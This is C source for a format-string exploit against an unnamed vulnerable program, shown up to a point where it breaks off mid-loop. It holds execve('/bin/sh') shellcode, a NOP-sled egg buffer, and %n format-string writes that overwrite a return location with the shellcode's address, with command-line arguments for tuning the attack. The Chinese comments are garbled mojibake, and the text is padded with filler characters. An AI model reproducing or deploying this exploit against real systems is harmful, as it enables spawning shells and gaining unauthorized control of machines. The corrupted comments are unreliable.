聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
#define DEFAULT_OFFSET聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng) 500聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
#define DEFAULT_ALIGNMENT聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng) 2聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
#define DEFAULT_RETLOC聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng) 0xbffffa6c聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
#define DEFAULT_BUFFER_SIZE聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng) 128聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
#define DEFAULT_EGG_SIZE聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng) 1024聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
#define NOP聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng) 0x90聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
char shellcode[] =聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng) "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
聽(tīng) "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
聽(tīng) "\x80\xe8\xdc\xff\xff\xff/bin/sh";

聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
unsigned long get_esp(void) {聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng)聽(tīng) __asm__("movl %esp,%eax");聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
}聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
main(int argc, char *argv[]) {聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng) char *buff[4], *ptr, *egg;聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng) char *env[2];
聽(tīng) long shell_addr,retloc=DEFAULT_RETLOC,tmpaddr;聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng) int offset=DEFAULT_OFFSET, align=DEFAULT_ALIGNMENT;聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng) int bsize=DEFAULT_BUFFER_SIZE, eggsize=DEFAULT_EGG_SIZE;聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng) int i,j;
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng) if (argc > 1) sscanf(argv[1],"%x",&retloc); /* 杈撳叆RETloc */
聽(tīng) if (argc > 2) offset聽(tīng) = atoi(argv[2]);聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng) if (argc > 3) align = atoi(argv[3]);聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng) if (argc > 4) bsize聽(tīng)聽(tīng) = atoi(argv[4]);聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng) if (argc > 5) eggsize = atoi(argv[5]);聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)

聽(tīng)
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng) printf("Usages: %s <RETloc> <offset> <align> <buffsize> <eggsize> \n",argv[0]);聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng) for(i = 0 ; i < 4 ; i++ ) {
聽(tīng)聽(tīng)聽(tīng) if (!(buff[i] = malloc(bsize))) {聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng) printf("Can't allocate memory.\n");聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng) exit(0);聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng)聽(tīng)聽(tīng) }
聽(tīng) }聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)

聽(tīng) if (!(egg = malloc(eggsize))) {聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng)聽(tīng)聽(tīng) printf("Can't allocate memory.\n");聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng)聽(tīng)聽(tīng) exit(0);聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng) }聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng) printf("Using RET location address: 0x%x\n", retloc);
聽(tīng) shell_addr = get_esp() + offset;聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng) /* 璁$畻shellcocde鎵鍦ㄧ殑鍦板潃 */聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng) printf("Using Shellcode address: 0x%x\n", shell_addr);
聽(tīng) for(j = 0; j < 4 ; j++) {聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng)聽(tīng)聽(tīng)聽(tīng) ptr = buff[j];聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng)聽(tīng)聽(tīng)聽(tīng) memset(ptr,'A',4);

聽(tīng)聽(tīng)聽(tīng)聽(tīng) ptr += align;
聽(tīng)聽(tīng)聽(tīng)聽(tīng) (*ptr++) =聽(tīng) retloc & 0x000000ff;聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng) /* 濉厖retloc */聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng)聽(tīng)聽(tīng)聽(tīng) (*ptr++) = (retloc & 0x0000ff00) >> 8;聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng)聽(tīng)聽(tīng)聽(tīng) (*ptr++) = (retloc & 0x00ff0000) >> 16;聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng)聽(tīng)聽(tīng)聽(tīng) (*ptr++) = (retloc & 0xff000000) >> 24;聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng)
聽(tīng)聽(tīng)聽(tīng)聽(tīng) retloc++; /* retloc鍦板潃鍚庣Щ涓涓瓧鑺傦紝浠ヤ究榪涜涓嬩竴嬈¤鐩?*/
聽(tīng)聽(tīng)聽(tīng)聽(tīng) for(i = 0 ; i < 4 ; i++ )
聽(tīng)聽(tīng)聽(tīng)聽(tīng) {
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng) memcpy(ptr, "%.10u", 5); /* 杈撳叆鏍煎紡涓詫紝璋冩暣%n鎵瀵瑰簲鐨勪綅緗?*/
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng) ptr += 5;
聽(tīng)聽(tīng)聽(tīng)聽(tīng) }
聽(tīng)聽(tīng)聽(tīng)聽(tīng) tmpaddr = (shell_addr >> j*8 ) & 0xff; /* 璁$畻SHj */
聽(tīng)聽(tīng)聽(tīng)聽(tīng) if(tmpaddr > 56 )聽(tīng) /* 璁$畻鏈鍚庝竴涓?nu涓殑n鍊?*/
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng) sprintf(ptr, "%%.%uu%%n", tmpaddr - 56);
聽(tīng)聽(tīng)聽(tīng)聽(tīng) else
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng) sprintf(ptr, "%%.%uu%%n", 1);

聽(tīng)
聽(tīng) }
聽(tīng) ptr = egg;聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng) for (i = 0; i < eggsize - strlen(shellcode) - 1; i++)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng)聽(tīng)聽(tīng) *(ptr++) = NOP;聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
